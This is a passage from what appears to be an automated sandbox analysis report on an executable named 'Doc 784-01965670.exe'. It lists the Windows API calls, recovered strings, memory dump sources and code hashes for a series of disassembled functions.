• Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
• Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
• GetDlgCtrlID.USER32(00000000), ref: 00469483
• GetParent.USER32 ref: 0046949E
• SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
• GetDlgCtrlID.USER32(00000000), ref: 004694A8
• GetParent.USER32 ref: 004694C1
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
• Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
• Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
APIs
  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
• SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
• SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
• Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
• Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
• Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
• Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
• Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
• Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
• Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
APIs
• GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                    • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                    • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                                    • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                    • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll
                                                                                                                                    • String ID: 0%d$DOWN$OFF
                                                                                                                                    • API String ID: 3832890014-468733193
                                                                                                                                    • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                    • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                                                    • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                    • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                                    • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                                    • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                                    Strings
                                                                                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                    • API String ID: 43541914-1568723262
                                                                                                                                    • Opcode ID: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                                    • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                                    • Opcode Fuzzy Hash: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                                    • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                                    APIs
                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DecrementInterlocked$Sleep
                                                                                                                                    • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                                                    • API String ID: 2250217261-3412429629
                                                                                                                                    • Opcode ID: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                                    • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                                                                    • Opcode Fuzzy Hash: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                                    • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                    • API String ID: 0-1603158881
                                                                                                                                    • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                    • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                                    • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                    • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00479D1F
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                                      • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                                      • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                                      • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                                    • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                    • API String ID: 665237470-60002521
                                                                                                                                    • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                    • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                                    • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                    • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 535477410-2761332787
                                                                                                                                    • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                    • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                                    • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                    • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0045F317
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                                    • IsMenu.USER32(?), ref: 0045F380
                                                                                                                                    • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                    • String ID: 0$2
                                                                                                                                    • API String ID: 3311875123-3793063076
                                                                                                                                    • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                    • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                                    • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                    • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Doc 784-01965670.exe), ref: 0043719E
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                                    • _printf.LIBCMT ref: 004371EC
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\Desktop\Doc 784-01965670.exe, xrefs: 00437189
                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString$Message_printf
                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Doc 784-01965670.exe
                                                                                                                                    • API String ID: 220974073-1046979815
                                                                                                                                    • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                    • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                                    • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                    • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                    • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                                    • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                    • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 978794511-0
                                                                                                                                    • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                    • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                    • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                    • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                    • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                                    • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                    • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                                      • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
